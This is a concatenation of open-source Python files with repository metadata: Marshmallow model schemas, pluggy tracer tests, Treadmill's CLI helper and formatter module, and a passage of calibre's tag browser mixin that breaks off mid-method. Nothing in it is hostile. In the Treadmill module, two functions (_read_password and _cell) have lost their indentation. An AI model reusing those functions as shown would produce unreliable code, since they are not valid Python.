ma = Marshmallow()
class ClientSchema(ma.ModelSchema):
    """(De)serialization schema auto-derived from the Client model."""
    class Meta:
        model = Client
class AreaSchema(ma.ModelSchema):
    """(De)serialization schema auto-derived from the Area model."""
    class Meta:
        model = Area
class FeatureSchema(ma.ModelSchema):
    """(De)serialization schema auto-derived from the Feature model."""
    class Meta:
        model = Feature
# Module-level singleton schema instances: one single-object serializer and
# one ``many=True`` variant (serializes lists of objects) per model.
client_schema = ClientSchema()
clients_schema = ClientSchema(many=True)
area_schema = AreaSchema()
areas_schema = AreaSchema(many=True)
feature_schema = FeatureSchema()
features_schema = FeatureSchema(many=True)
|
yuriyarhipov/FeatureRequestApp
|
schemas.py
|
Python
|
mit
| 546
|
from pluggy._tracing import TagTracer
import pytest
from typing import List
@pytest.fixture
def rootlogger() -> TagTracer:
    """Fresh root TagTracer instance for each test."""
    return TagTracer()
def test_simple(rootlogger: TagTracer) -> None:
    log = rootlogger.get("pytest")
    # No writer configured yet — this first message is dropped.
    log("hello")
    out: List[str] = []
    rootlogger.setwriter(out.append)
    log("world")
    assert len(out) == 1
    assert out[0] == "world [pytest]\n"
    # Sub-loggers extend the tag path with a colon separator.
    sublog = log.get("collection")
    sublog("hello")
    assert out[1] == "hello [pytest:collection]\n"
def test_indent(rootlogger: TagTracer) -> None:
    log = rootlogger.get("1")
    out = []
    log.root.setwriter(lambda arg: out.append(arg))
    log("hello")
    # Indentation is a root-level counter shared by all sub-loggers.
    log.root.indent += 1
    log("line1")
    log("line2")
    log.root.indent += 1
    log("line3")
    log("line4")
    log.root.indent -= 1
    log("line5")
    log.root.indent -= 1
    log("last")
    assert len(out) == 7
    # Strip the trailing " [tag]\n" suffix to compare only the messages.
    names = [x[: x.rfind(" [")] for x in out]
    assert names == [
        "hello",
        "  line1",
        "  line2",
        "    line3",
        "    line4",
        "  line5",
        "last",
    ]
def test_readable_output_dictargs(rootlogger: TagTracer) -> None:
    # Plain args are rendered inline; a trailing dict arg becomes
    # indented "key: value" lines.
    out = rootlogger._format_message(["test"], [1])
    assert out == "1 [test]\n"
    out2 = rootlogger._format_message(["test"], ["test", {"a": 1}])
    assert out2 == "test [test]\n a: 1\n"
def test_setprocessor(rootlogger: TagTracer) -> None:
    log = rootlogger.get("1")
    log2 = log.get("2")
    assert log2.tags == tuple("12")
    out = []
    # A processor is registered for an exact tag path; the parent logger
    # ("1") does not match ("1", "2").
    rootlogger.setprocessor(tuple("12"), lambda *args: out.append(args))
    log("not seen")
    log2("seen")
    assert len(out) == 1
    tags, args = out[0]
    assert "1" in tags
    assert "2" in tags
    assert args == ("seen",)
    l2 = []
    # The tag path may also be given in "a:b" string form.
    rootlogger.setprocessor("1:2", lambda *args: l2.append(args))
    log2("seen")
    tags, args = l2[0]
    assert args == ("seen",)
|
pytest-dev/pluggy
|
testing/test_tracer.py
|
Python
|
mit
| 1,900
|
"""Treadmill commaand line helpers.
"""
import codecs
import collections
import copy
import functools
import importlib
import json
import logging
import logging.config
import os
import pkg_resources
import pkgutil
import re
import sys
import tempfile
import traceback

import click
import prettytable
import yaml
from six.moves import configparser

from treadmill import context
from treadmill import restclient
from treadmill import utils
# Allow this package's path to be extended by plugins (namespace package).
__path__ = pkgutil.extend_path(__path__, __name__)
# Default process exit code for CLI failures.
EXIT_CODE_DEFAULT = 1
# IPA passwords must be at least 8 characters long.
IPA_PASSWORD_RE = re.compile('.{8,}')
def init_logger(name):
    """Initialize logging from the bundled ``treadmill/logging/<name>`` file.

    :param name: file name of the logging configuration resource.
    """
    # BUG FIX: ``logging.config`` is a submodule and is not guaranteed to be
    # importable via the bare ``import logging`` at the top of this module.
    import logging.config
    log_conf_file = pkg_resources.resource_stream(
        'treadmill',
        '/logging/{name}'.format(name=name)
    )
    try:
        logging.config.fileConfig(
            codecs.getreader('utf-8')(log_conf_file)
        )
    except configparser.Error:
        # Keep the traceback for debugging but never crash the CLI on a
        # malformed logging config.
        # BUG FIX: open the temp file in text mode — traceback.print_exc
        # raises TypeError on a binary file under Python 3 (the sibling
        # make_multi_command handler already used mode='w').
        with tempfile.NamedTemporaryFile(delete=False, mode='w') as f:
            traceback.print_exc(file=f)
        click.echo('Error parsing log conf: {name}'.format(name=name),
                   err=True)
def make_multi_command(module_name, **click_args):
    """Make a Click multicommand from all submodules of the module."""
    class MCommand(click.MultiCommand):
        """Treadmill CLI driver."""
        def __init__(self, *args, **kwargs):
            if kwargs and click_args:
                kwargs.update(click_args)
            click.MultiCommand.__init__(self, *args, **kwargs)
        def list_commands(self, ctx):
            # Each submodule of `module_name` is a CLI command; underscores
            # in module names map to dashes on the command line.
            climod = importlib.import_module(module_name)
            commands = set(
                [modulename for _loader, modulename, _ispkg
                 in pkgutil.iter_modules(climod.__path__)]
            )
            return sorted([cmd.replace('_', '-') for cmd in commands])
        def get_command(self, ctx, name):
            try:
                full_name = '.'.join([module_name, name.replace('-', '_')])
                mod = importlib.import_module(full_name)
                return mod.init()
            except Exception:  # pylint: disable=W0703
                # A broken plugin must not take down the whole CLI: dump the
                # traceback to a temp file and report its location instead.
                with tempfile.NamedTemporaryFile(delete=False, mode='w') as f:
                    traceback.print_exc(file=f)
                click.echo(
                    'Unable to load plugin: %s [ %s ]' % (name, f.name),
                    err=True)
                return
    return MCommand
def _read_password(value):
"""Heuristic to either read the password from file or return the value."""
if os.path.exists(value):
with open(value) as f:
return f.read().strip()
else:
return value
def handle_context_opt(ctx, param, value):
    """Handle eager CLI options to configure context.
    The eager options are evaluated directly during parsing phase, and can
    affect other options parsing (like required/not).
    The only side effect of consuming these options are setting attributes
    of the global context.
    """
    def parse_dns_server(dns_server):
        """Parse dns server string"""
        # "host1,host2:port" -> (['host1', 'host2'], port); port optional.
        if ':' in dns_server:
            hosts_port = dns_server.split(':')
            return (hosts_port[0].split(','), int(hosts_port[1]))
        else:
            return (dns_server.split(','), None)
    if not value or ctx.resilient_parsing:
        return None
    # NOTE(review): '-' is treated as an explicit "no value" placeholder —
    # confirm against callers.
    if value == '-':
        return None
    opt = param.name
    if opt == 'cell':
        context.GLOBAL.cell = value
    elif opt == 'dns_domain':
        context.GLOBAL.dns_domain = value
    elif opt == 'dns_server':
        context.GLOBAL.dns_server = parse_dns_server(value)
    elif opt == 'ldap':
        context.GLOBAL.ldap.url = value
    elif opt == 'ldap_suffix':
        context.GLOBAL.ldap.ldap_suffix = value
    elif opt == 'ldap_user':
        context.GLOBAL.ldap.user = value
    elif opt == 'ldap_pwd':
        # The password may be given inline or as a path to a password file.
        context.GLOBAL.ldap.password = _read_password(value)
    elif opt == 'zookeeper':
        context.GLOBAL.zk.url = value
    else:
        raise click.UsageError('Invalid option: %s' % param.name)
    return value
class _CommaSepList(click.ParamType):
    """Custom input type for comma separated values."""
    name = 'list'
    def convert(self, value, param, ctx):
        """Convert command line argument to list."""
        if value is None:
            # Absent option -> empty list rather than None.
            return []
        try:
            return value.split(',')
        except AttributeError:
            self.fail('%s is not a comma separated list' % value, param, ctx)
LIST = _CommaSepList()
class _KeyValuePairs(click.ParamType):
    """Custom input type for key/value pairs, e.g. ``a=1,b=2``."""

    name = 'key/value pairs'

    def convert(self, value, param, ctx):
        """Convert command line argument to a dict of key/value pairs."""
        if value is None:
            return {}

        # Split on "key=" tokens; the capturing group keeps the delimiters,
        # yielding ['', 'a=', '1,', 'b=', '2', ...].
        items = re.split(r'(\w+=)', value)
        # Drop the (normally empty) text before the first "key=".
        items.pop(0)
        # Even positions hold the captured 'key=' delimiters.
        keys = [key.rstrip('=') for key in items[0::2]]
        # Odd positions hold the values; strip the trailing ',' separator.
        # NOTE(review): the comprehension variable shadows the ``value``
        # parameter; harmless here since ``value`` is not used afterwards.
        values = [value.rstrip(',') for value in items[1::2]]
        return dict(zip(keys, values))


# Shared ready-to-use key/value pairs parameter type.
DICT = _KeyValuePairs()
def validate_memory(_ctx, _param, value):
    """Click callback validating a memory size string, e.g. ``512M``.

    :returns: the value unchanged when valid, ``None`` when not provided.
    :raises click.BadParameter: when the value is malformed.
    """
    if value is None:
        return
    # ``re.match`` anchors at the start; together with ``$`` the whole
    # string must be digits plus one K/M/G suffix. The previous
    # ``re.search`` accepted garbage prefixes such as ``x100M``.
    if not re.match(r'\d+[KkMmGg]$', value):
        raise click.BadParameter('Memory format: nnn[K|M|G].')
    return value
def validate_disk(_ctx, _param, value):
    """Click callback validating a disk size string, e.g. ``10G``.

    :returns: the value unchanged when valid, ``None`` when not provided.
    :raises click.BadParameter: when the value is malformed.
    """
    if value is None:
        return
    # Anchor at the start (re.match) so prefixed garbage is rejected; the
    # previous re.search accepted e.g. ``abc10G``.
    if not re.match(r'\d+[KkMmGg]$', value):
        # Fixed the garbled 'nnn[K|M|Gyy]' message.
        raise click.BadParameter('Disk format: nnn[K|M|G].')
    return value
def validate_cpu(_ctx, _param, value):
    """Click callback validating a cpu percentage string, e.g. ``100%``.

    :returns: the value unchanged when valid, ``None`` when not provided.
    :raises click.BadParameter: when the value is malformed.
    """
    if value is None:
        return
    # Anchor at the start (re.match) so prefixed garbage is rejected; the
    # previous re.search accepted e.g. ``abc50%``.
    if not re.match(r'\d+%$', value):
        raise click.BadParameter('CPU format: nnn%.')
    return value
def wrap_words(words, length, sep=',', newline='\n'):
    """Join *words* with *sep*, breaking lines at roughly *length* chars.

    NOTE: the *words* list is consumed (emptied) in the process, matching
    the original contract of this helper.
    """
    finished = []
    current = []
    used = 0
    while words:
        # Break before adding the next word once the accumulated word
        # characters plus one separator per word exceed the budget.
        if used + len(current) > length:
            finished.append(current)
            current = []
            used = 0
        token = words.pop(0)
        used += len(token)
        current.append(token)
    finished.append(current)
    return newline.join(sep.join(chunk) for chunk in finished)
def make_wrap_words(length, sep=','):
    """Return a single-argument word-wrapping function.

    The returned callable joins its word list via :func:`wrap_words` with
    the given *length* and *sep* baked in.
    """
    def _wrapper(words):
        return wrap_words(words, length, sep)
    return _wrapper
def _make_table(columns, header=False):
    """Construct the left-aligned ``prettytable`` used for all CLI output.

    :param columns: iterable of column names.
    :param header: when ``True`` column names are printed as a header row.
    :returns: a configured ``prettytable.PrettyTable`` instance.
    """
    table = prettytable.PrettyTable(columns)
    for col in columns:
        table.align[col] = 'l'
    table.set_style(prettytable.PLAIN_COLUMNS)
    # NOTE: header must be assigned *after* set_style(), which resets it.
    table.header = header
    table.left_padding_width = 0
    table.right_padding_width = 2
    return table
def _cell(item, column, key, fmt):
"""Constructs a value in table cell."""
if key is None:
key = column
if isinstance(key, str):
keys = [key]
else:
keys = key
raw_value = None
while keys:
key = keys.pop(0)
if key in item:
raw_value = item[key]
break
if isinstance(fmt, collections.Callable):
try:
value = fmt(raw_value)
except Exception: # pylint: disable=W0703
if raw_value is None:
value = '-'
else:
raise
else:
if raw_value is None:
value = '-'
else:
if isinstance(raw_value, list):
value = ','.join(map(str, raw_value))
else:
value = raw_value
return value
def dict_to_table(item, schema):
    """Render a mapping as a two-column ``key : value`` table."""
    table = _make_table(['key', '', 'value'], header=False)
    for column, key, fmt in schema:
        table.add_row([column, ':', _cell(item, column, key, fmt)])
    return table
def make_dict_to_table(schema):
    """Return a function rendering a dict as a table with *schema*."""
    def _formatter(item):
        return dict_to_table(item, schema)
    return _formatter
def list_to_table(items, schema, header=True):
    """Render a list of mappings as a table, one row per item."""
    columns = [column for column, _, _ in schema]
    table = _make_table(columns, header=header)
    for item in (items if items is not None else []):
        table.add_row([_cell(item, column, key, fmt)
                       for column, key, fmt in schema])
    return table
def make_list_to_table(schema, header=True):
    """Return a function rendering a list as a table with *schema*."""
    def _formatter(items):
        return list_to_table(items, schema, header)
    return _formatter
def combine(list_of_values, sep=','):
    """Split each value on *sep* and concatenate the pieces into one list.

    A combined result of exactly ``['-']`` is normalized to ``None``.
    """
    pieces = []
    for values in list(list_of_values):
        pieces.extend(str(values).split(sep))
    if pieces == ['-']:
        return None
    return pieces
def out(string, *args):
    """Print *string* to stdout, expanding optional %-style placeholders."""
    click.echo(string % args if args else string)
def handle_exceptions(exclist):
    """Decorator factory producing friendly CLI error handling.

    :param exclist: list of ``(exception_class, handler)`` tuples, where a
        handler is a string (printed verbatim), ``None`` (print the
        exception) or a callable returning the message.
    :returns: a decorator; listed exceptions are reported and exit with
        ``EXIT_CODE_DEFAULT``, any other exception has its traceback saved
        to a temp file and is reported generically.
    """
    def wrap(f):
        """Returns decorator that wraps/handles exceptions."""

        def _dispatch(remaining, args, kwargs):
            """Nest one try/except per handler, innermost = last entry.

            The remaining handler list is passed as an argument rather than
            popped from a shared closure list: the previous implementation
            consumed the shared list on the first call, so subsequent
            invocations of the decorated function were left unhandled.
            """
            if not remaining:
                return f(*args, **kwargs)
            exc, handler = remaining[0]
            try:
                return _dispatch(remaining[1:], args, kwargs)
            except exc as err:
                if isinstance(handler, str):
                    click.echo(handler, err=True)
                elif handler is None:
                    click.echo(str(err), err=True)
                else:
                    click.echo(handler(err), err=True)
                sys.exit(EXIT_CODE_DEFAULT)

        @functools.wraps(f)
        def _handle_any(*args, **kwargs):
            """Default exception handler."""
            try:
                # Also propagate f's return value (previously dropped).
                return _dispatch(list(exclist), args, kwargs)
            except Exception as unhandled:  # pylint: disable=W0703
                # Keep the full traceback for debugging; only the temp file
                # name is shown to the user.
                with tempfile.NamedTemporaryFile(delete=False,
                                                 mode='w') as f_trace:
                    traceback.print_exc(file=f_trace)
                click.echo('Error: %s [ %s ]' % (unhandled, f_trace.name),
                           err=True)
                sys.exit(EXIT_CODE_DEFAULT)

        return _handle_any

    return wrap
# Global default output format consumed by ``make_formatter``; commands may
# switch it to 'json' or 'yaml' process-wide.
OUTPUT_FORMAT = 'pretty'
def make_formatter(pretty_formatter):
    """Build a formatter dispatching on the requested output format.

    :param pretty_formatter: object with a ``format`` attribute, a bare
        callable, or ``None`` to disable pretty output.
    :returns: ``_format(item, how=None)``; ``how`` defaults to the global
        ``OUTPUT_FORMAT``, unknown formats fall back to ``str``.
    """
    def _format(item, how=None):
        """Format *item* according to *how* (or the global setting)."""
        formatters = {
            'json': json.dumps,
            'yaml': utils.dump_yaml,
        }
        if pretty_formatter is not None:
            formatters['pretty'] = getattr(
                pretty_formatter, 'format', pretty_formatter)

        chosen = OUTPUT_FORMAT if how is None else how
        return formatters.get(chosen, str)(item)

    return _format
class AppPrettyFormatter(object):
    """Pretty table app formatter."""

    @staticmethod
    def format(item):
        """Return pretty-formatted item (single manifest dict or a list)."""
        # Nested sub-tables rendered inside the 'services' column.
        services_restart_tbl = make_dict_to_table([
            ('limit', None, None),
            ('interval', None, None),
        ])
        services_tbl = make_list_to_table([
            ('name', None, None),
            ('root', None, None),
            ('restart', None, services_restart_tbl),
            (
                'command',
                None,
                # Wrap long command lines at ~40 chars, indenting the
                # continuation lines by one space.
                lambda cmd: wrap_words(cmd.split(), 40, ' ', '\n ')
            ),
        ])

        endpoints_tbl = make_list_to_table([
            ('name', None, None),
            ('port', None, None),
            # Protocol defaults to tcp when not given.
            ('proto', None, lambda proto: proto if proto else 'tcp'),
            ('type', None, None),
        ])

        environ_tbl = make_list_to_table([
            ('name', None, None),
            ('value', None, None),
        ])

        vring_rules_tbl = make_list_to_table([
            ('pattern', None, None),
            ('endpoints', None, ','.join),
        ])
        vring_tbl = make_dict_to_table([
            ('cells', None, ','.join),
            ('rules', None, vring_rules_tbl),
        ])

        ephemeral_tbl = make_dict_to_table([
            ('tcp', None, None),
            ('udp', None, None),
        ])

        # Full schema used when showing a single application.
        schema = [
            ('name', '_id', None),
            ('memory', None, None),
            ('cpu', None, None),
            ('disk', None, None),
            ('tickets', None, None),
            ('features', None, None),
            ('identity-group', 'identity_group', None),
            ('schedule-once', 'schedule_once', None),
            ('shared-ip', 'shared_ip', None),
            ('ephemeral-ports', 'ephemeral_ports', ephemeral_tbl),
            ('services', None, services_tbl),
            ('endpoints', None, endpoints_tbl),
            ('environ', None, environ_tbl),
            ('vring', None, vring_tbl),
            ('passthrough', None, '\n'.join),
            ('data-retention-timeout', 'data_retention_timeout', None),
        ]

        format_item = make_dict_to_table(schema)

        # Lists show only a condensed subset of the columns.
        format_list = make_list_to_table([
            ('name', '_id', None),
            ('memory', None, None),
            ('cpu', None, None),
            ('disk', None, None),
            ('tickets', None, None),
            ('features', None, None),
        ])

        if isinstance(item, list):
            return format_list(item)
        else:
            return format_item(item)
class AppMonitorPrettyFormatter(object):
    """Pretty table app monitor formatter."""

    @staticmethod
    def format(item):
        """Render one app-monitor dict, or a list of them, as a table."""
        layout = [('monitor', '_id', None),
                  ('count', 'count', None)]
        if isinstance(item, list):
            return make_list_to_table(layout)(item)
        return make_dict_to_table(layout)(item)
class IdentityGroupPrettyFormatter(object):
    """Pretty table identity group formatter."""

    @staticmethod
    def format(item):
        """Render one identity-group dict, or a list of them, as a table."""
        layout = [('identity-group', '_id', None),
                  ('count', 'count', None)]
        if isinstance(item, list):
            return make_list_to_table(layout)(item)
        return make_dict_to_table(layout)(item)
class ServerPrettyFormatter(object):
    """Pretty table server formatter."""

    @staticmethod
    def format(item):
        """Render one server dict, or a list of them, as a table."""
        layout = [
            ('name', '_id', None),
            ('cell', None, None),
            ('traits', None, None),
            ('partition', None, None),
            ('data', None, None),
        ]
        if isinstance(item, list):
            return make_list_to_table(layout)(item)
        return make_dict_to_table(layout)(item)
class ServerNodePrettyFormatter(object):
    """Pretty table server (scheduler) node formatter."""

    @staticmethod
    def format(item):
        """Render one scheduler node dict, or a list of them, as a table."""
        layout = [
            ('name', None, None),
            ('memory', None, None),
            ('cpu', None, None),
            ('disk', None, None),
            ('partition', None, None),
            ('parent', None, None),
            ('traits', None, None),
        ]
        if isinstance(item, list):
            return make_list_to_table(layout)(item)
        return make_dict_to_table(layout)(item)
class LdapSchemaPrettyFormatter(object):
    """Pretty table ldap schema formatter."""

    @staticmethod
    def format(item):
        """Render the LDAP schema dict (dn, attributes, objects)."""
        attr_formatter = make_list_to_table([
            ('name', None, None),
            ('desc', None, None),
            ('type', None, None),
            ('ignore_case', None, None),
        ])
        objcls_formatter = make_list_to_table([
            ('name', None, None),
            ('desc', None, None),
            ('must', None, None),
            ('may', None, make_wrap_words(40)),
        ])
        top_formatter = make_dict_to_table([
            ('dn', None, None),
            ('attributes', 'attributeTypes', attr_formatter),
            ('objects', 'objectClasses', objcls_formatter),
        ])
        return top_formatter(item)
class BucketPrettyFormatter(object):
    """Pretty table bucket formatter."""

    @staticmethod
    def format(item):
        """Render one bucket dict, or a list of them, as a table."""
        layout = [('name', None, None),
                  ('parent', None, None),
                  ('traits', None, None)]
        if isinstance(item, list):
            return make_list_to_table(layout)(item)
        return make_dict_to_table(layout)(item)
class CellPrettyFormatter(object):
    """Pretty table cell formatter."""

    @staticmethod
    def format(item):
        """Return pretty-formatted item (single cell dict or a list)."""
        # Sub-table describing the Zookeeper master ensemble.
        masters_tbl = make_list_to_table([
            ('idx', None, None),
            ('hostname', None, None),
            ('zk-client-port', None, None),
            ('zk-jmx-port', None, None),
            ('zk-followers-port', None, None),
            ('zk-election-port', None, None),
        ])

        # Sub-table describing the cell's scheduler partitions.
        partitions_tbl = make_list_to_table([
            ('id', 'partition', None),
            ('cpu', None, None),
            ('disk', None, None),
            ('memory', None, None),
            ('down threshold', 'down-threshold', None),
        ])

        schema = [
            ('name', '_id', None),
            ('version', None, None),
            ('root', None, None),
            ('username', None, None),
            ('location', None, None),
            ('archive-server', None, None),
            ('archive-username', None, None),
            ('ssq-namespace', None, None),
            ('masters', None, masters_tbl),
            ('partitions', None, partitions_tbl),
            # Free-form data is dumped as YAML.
            ('data', None, yaml.dump),
        ]

        format_item = make_dict_to_table(schema)

        # Lists show only a condensed subset of the columns.
        format_list = make_list_to_table([
            ('name', '_id', None),
            ('location', None, None),
            ('version', None, None),
            ('username', None, None),
            ('root', None, None),
        ])

        if isinstance(item, list):
            return format_list(item)
        else:
            return format_item(item)
class DNSPrettyFormatter(object):
    """Pretty table critical DNS formatter."""

    @staticmethod
    def format(item):
        """Render one DNS config dict, or a list of them, as a table."""
        item_layout = [('name', '_id', None),
                       ('location', None, None),
                       ('servers', 'server', '\n'.join),
                       ('rest-servers', 'rest-server', '\n'.join),
                       ('zkurl', None, None),
                       ('fqdn', None, None),
                       ('ttl', None, None),
                       ('nameservers', None, '\n'.join)]
        list_layout = [
            ('name', '_id', None),
            ('location', None, None),
            ('fqdn', None, None),
            ('servers', 'server', ','.join),
        ]
        if isinstance(item, list):
            return make_list_to_table(list_layout)(item)
        return make_dict_to_table(item_layout)(item)
class AppGroupPrettyFormatter(object):
    """Pretty table App Groups formatter."""

    @staticmethod
    def format(item):
        """Render one app-group dict, or a list of them, as a table."""
        layout = [('name', '_id', None),
                  ('type', 'group-type', None),
                  ('cells', None, None),
                  ('pattern', None, None),
                  ('endpoints', None, None),
                  ('data', None, None)]
        if isinstance(item, list):
            return make_list_to_table(layout)(item)
        return make_dict_to_table(layout)(item)
class TenantPrettyFormatter(object):
    """Pretty table tenant formatter."""

    @staticmethod
    def format(item):
        """Render one tenant dict, or a list of them, as a table."""
        layout = [
            ('tenant', ['_id', 'tenant'], None),
            ('system', 'systems', None),
            # Nested allocations reuse the allocation formatter.
            ('allocations', 'allocations', AllocationPrettyFormatter.format),
        ]
        if isinstance(item, list):
            return make_list_to_table(layout)(item)
        return make_dict_to_table(layout)(item)
class AllocationPrettyFormatter(object):
    """Pretty table allocation formatter."""

    @staticmethod
    def format(item):
        """Render one allocation dict, or a list of them, as a table."""
        assignments_formatter = make_list_to_table([
            ('pattern', None, None),
            ('priority', None, None),
        ])
        reservations_formatter = make_list_to_table([
            ('cell', 'cell', None),
            ('partition', None, None),
            ('rank', None, None),
            ('max-utilization', None, None),
            ('memory', None, None),
            ('cpu', None, None),
            ('disk', None, None),
            ('traits', None, '\n'.join),
            ('assignments', None, assignments_formatter),
        ])
        layout = [
            ('name', '_id', None),
            ('environment', None, None),
            ('reservations', None, reservations_formatter),
        ]
        if isinstance(item, list):
            return make_list_to_table(layout)(item)
        return make_dict_to_table(layout)(item)
class InstanceStatePrettyFormatter(object):
    """Pretty table instance state formatter."""

    @staticmethod
    def format(item):
        """Render one instance-state dict, or a list of them, as a table."""
        layout = [
            ('name', None, None),
            ('state', None, None),
            ('host', None, None),
        ]
        if isinstance(item, list):
            # Lists are printed without a header row.
            return make_list_to_table(layout, header=False)(item)
        return make_dict_to_table(layout)(item)
class EndpointPrettyFormatter(object):
    """Pretty table endpoint formatter."""

    @staticmethod
    def format(item):
        """Render one endpoint dict, or a list of them, as a table."""
        layout = [
            ('name', None, None),
            ('proto', None, None),
            ('endpoint', None, None),
            ('hostport', None, None),
        ]
        if isinstance(item, list):
            # Lists are printed without a header row.
            return make_list_to_table(layout, header=False)(item)
        return make_dict_to_table(layout)(item)
class PartitionPrettyFormatter(object):
    """Pretty table partition formatter."""

    @staticmethod
    def format(item):
        """Render one partition dict, or a list of them, as a table."""
        layout = [
            ('id', 'partition', None),
            ('cell', None, None),
            ('cpu', None, None),
            ('disk', None, None),
            ('memory', None, None),
            ('down threshold', 'down-threshold', None),
        ]
        if isinstance(item, list):
            return make_list_to_table(layout)(item)
        return make_dict_to_table(layout)(item)
class CronPrettyFormatter(object):
    """Pretty table formatter for cron jobs."""

    @staticmethod
    def format(item):
        """Render one cron-job dict, or a list of them, as a table."""
        layout = [
            ('id', '_id', None),
            ('resource', None, None),
            ('event', None, None),
            ('action', None, None),
            ('count', None, None),
            ('expression', None, None),
            ('next_run_time', None, None),
            ('timezone', None, None),
        ]
        if isinstance(item, list):
            return make_list_to_table(layout)(item)
        return make_dict_to_table(layout)(item)
def bad_exit(string, *args):
    """Print *string* (with optional %-args) to stderr and exit non-zero.

    The printing takes care of the newline.
    """
    click.echo(string % args if args else string, err=True)
    sys.exit(-1)
def echo_colour(colour, string, *args):
    """click.echo in the given colour with %-style placeholder support."""
    message = string % args if args else string
    click.echo(click.style(message, fg=colour))
def echo_green(string, *args):
    """Echo *string* to stdout in green (supports %-placeholders)."""
    echo_colour('green', string, *args)
def echo_yellow(string, *args):
    """Echo *string* to stdout in yellow (supports %-placeholders)."""
    echo_colour('yellow', string, *args)
def echo_red(string, *args):
    """click.echo red with support for placeholders, e.g. %s"""
    echo_colour('red', string, *args)
def handle_not_authorized(err):
    """Handle REST NotAuthorizedExceptions: print a friendly summary."""
    msg = str(err)
    # NOTE(review): r'\n' is the two-character sequence backslash + n, so
    # this splits on a *literal* "\n" embedded in the server message, not
    # on real newlines -- presumably matching how the REST error payload is
    # serialized; confirm against the server response format.
    msgs = [re.sub(r'failure: ', ' ', line) for line in msg.split(r'\n')]
    echo_red('Not authorized.')
    click.echo('\n'.join(msgs), nl=False)
# Map restclient exceptions to user-friendly messages/handlers; consumed by
# ``handle_exceptions``. A handler of ``None`` prints ``str(exc)``.
REST_EXCEPTIONS = [
    (restclient.NotFoundError, 'Resource not found'),
    (restclient.AlreadyExistsError, 'Resource already exists'),
    (restclient.ValidationError, None),
    (restclient.NotAuthorizedError, handle_not_authorized),
    (restclient.BadRequestError, None),
    (restclient.MaxRequestRetriesError, None)
]

# Ready-made decorator handling the common REST client errors.
ON_REST_EXCEPTIONS = handle_exceptions(REST_EXCEPTIONS)
|
ThoughtWorksInc/treadmill
|
treadmill/cli/__init__.py
|
Python
|
apache-2.0
| 26,172
|
#!/usr/bin/env python
# vim:fileencoding=UTF-8:ts=4:sw=4:sta:et:sts=4:ai
from __future__ import (unicode_literals, division, absolute_import,
print_function)
__license__ = 'GPL v3'
__copyright__ = '2011, Kovid Goyal <kovid@kovidgoyal.net>'
__docformat__ = 'restructuredtext en'
from functools import partial
from PyQt4.Qt import (Qt, QIcon, QWidget, QHBoxLayout, QVBoxLayout, QShortcut,
QKeySequence, QToolButton, QString, QLabel, QFrame, QTimer,
QMenu, QPushButton, QActionGroup)
from calibre.gui2 import error_dialog, question_dialog
from calibre.gui2.widgets import HistoryLineEdit
from calibre.library.field_metadata import category_icon_map
from calibre.utils.icu import sort_key
from calibre.gui2.tag_browser.view import TagsView
from calibre.ebooks.metadata import title_sort
from calibre.gui2.dialogs.tag_categories import TagCategories
from calibre.gui2.dialogs.tag_list_editor import TagListEditor
from calibre.gui2.dialogs.edit_authors_dialog import EditAuthorsDialog
class TagBrowserMixin(object):  # {{{
    """Glue between the Tag Browser view and the rest of the calibre GUI.

    NOTE(review): this mixin assumes the host window already provides
    ``library_view``, ``tags_view``, ``alter_tb``, ``search``,
    ``current_db`` and the saved-search slots connected below.
    """

    def __init__(self, db):
        # Keep category counts in sync with changes to the book list.
        self.library_view.model().count_changed_signal.connect(self.tags_view.recount)
        self.tags_view.set_database(db, self.alter_tb)
        self.tags_view.tags_marked.connect(self.search.set_search_string)
        # Edit/management actions emitted by the view are handled here.
        self.tags_view.tags_list_edit.connect(self.do_tags_list_edit)
        self.tags_view.edit_user_category.connect(self.do_edit_user_categories)
        self.tags_view.delete_user_category.connect(self.do_delete_user_category)
        self.tags_view.del_item_from_user_cat.connect(self.do_del_item_from_user_cat)
        self.tags_view.add_subcategory.connect(self.do_add_subcategory)
        self.tags_view.add_item_to_user_cat.connect(self.do_add_item_to_user_cat)
        self.tags_view.saved_search_edit.connect(self.do_saved_search_edit)
        self.tags_view.rebuild_saved_searches.connect(self.do_rebuild_saved_searches)
        self.tags_view.author_sort_edit.connect(self.do_author_sort_edit)
        self.tags_view.tag_item_renamed.connect(self.do_tag_item_renamed)
        self.tags_view.search_item_renamed.connect(self.saved_searches_changed)
        self.tags_view.drag_drop_finished.connect(self.drag_drop_finished)
        # Queued so the error dialog is shown outside the emitting call stack.
        self.tags_view.restriction_error.connect(self.do_restriction_error,
                type=Qt.QueuedConnection)
        self.tags_view.tag_item_delete.connect(self.do_tag_item_delete)

        # Populate the "manage" menu of the Alter Tag Browser button.
        for text, func, args, cat_name in (
                (_('Manage Authors'),
                 self.do_author_sort_edit, (self, None), 'authors'),
                (_('Manage Series'),
                 self.do_tags_list_edit, (None, 'series'), 'series'),
                (_('Manage Publishers'),
                 self.do_tags_list_edit, (None, 'publisher'), 'publisher'),
                (_('Manage Tags'),
                 self.do_tags_list_edit, (None, 'tags'), 'tags'),
                (_('Manage User Categories'),
                 self.do_edit_user_categories, (None,), 'user:'),
                (_('Manage Saved Searches'),
                 self.do_saved_search_edit, (None,), 'search')
        ):
            m = self.alter_tb.manage_menu
            m.addAction(QIcon(I(category_icon_map[cat_name])), text,
                    partial(func, *args))

    def do_restriction_error(self):
        # Shown (queued) when the current search restriction fails to parse.
        error_dialog(self.tags_view, _('Invalid search restriction'),
                _('The current search restriction is invalid'), show=True)

    def do_add_subcategory(self, on_category_key, new_category_name=None):
        '''
        Add a subcategory to the category 'on_category'. If new_category_name is
        None, then a default name is shown and the user is offered the
        opportunity to edit the name.
        '''
        db = self.library_view.model().db
        user_cats = db.prefs.get('user_categories', {})

        # Ensure that the temporary name we will use is not already there
        i = 0
        if new_category_name is not None:
            new_name = new_category_name.replace('.', '')
        else:
            new_name = _('New Category').replace('.', '')
        n = new_name
        while True:
            new_cat = on_category_key[1:] + '.' + n
            if new_cat not in user_cats:
                break
            i += 1
            n = new_name + unicode(i)
        # Add the new category
        user_cats[new_cat] = []
        db.prefs.set('user_categories', user_cats)
        self.tags_view.recount()
        m = self.tags_view.model()
        idx = m.index_for_path(m.find_category_node('@' + new_cat))
        self.tags_view.show_item_at_index(idx)
        # Open the editor on the new item to rename it
        if new_category_name is None:
            self.tags_view.edit(idx)

    def do_edit_user_categories(self, on_category=None):
        '''
        Open the user categories editor.
        '''
        db = self.library_view.model().db
        d = TagCategories(self, db, on_category)
        if d.exec_() == d.Accepted:
            # Persist, then rebuild field metadata and search locations so
            # the new categories are immediately searchable.
            db.prefs.set('user_categories', d.categories)
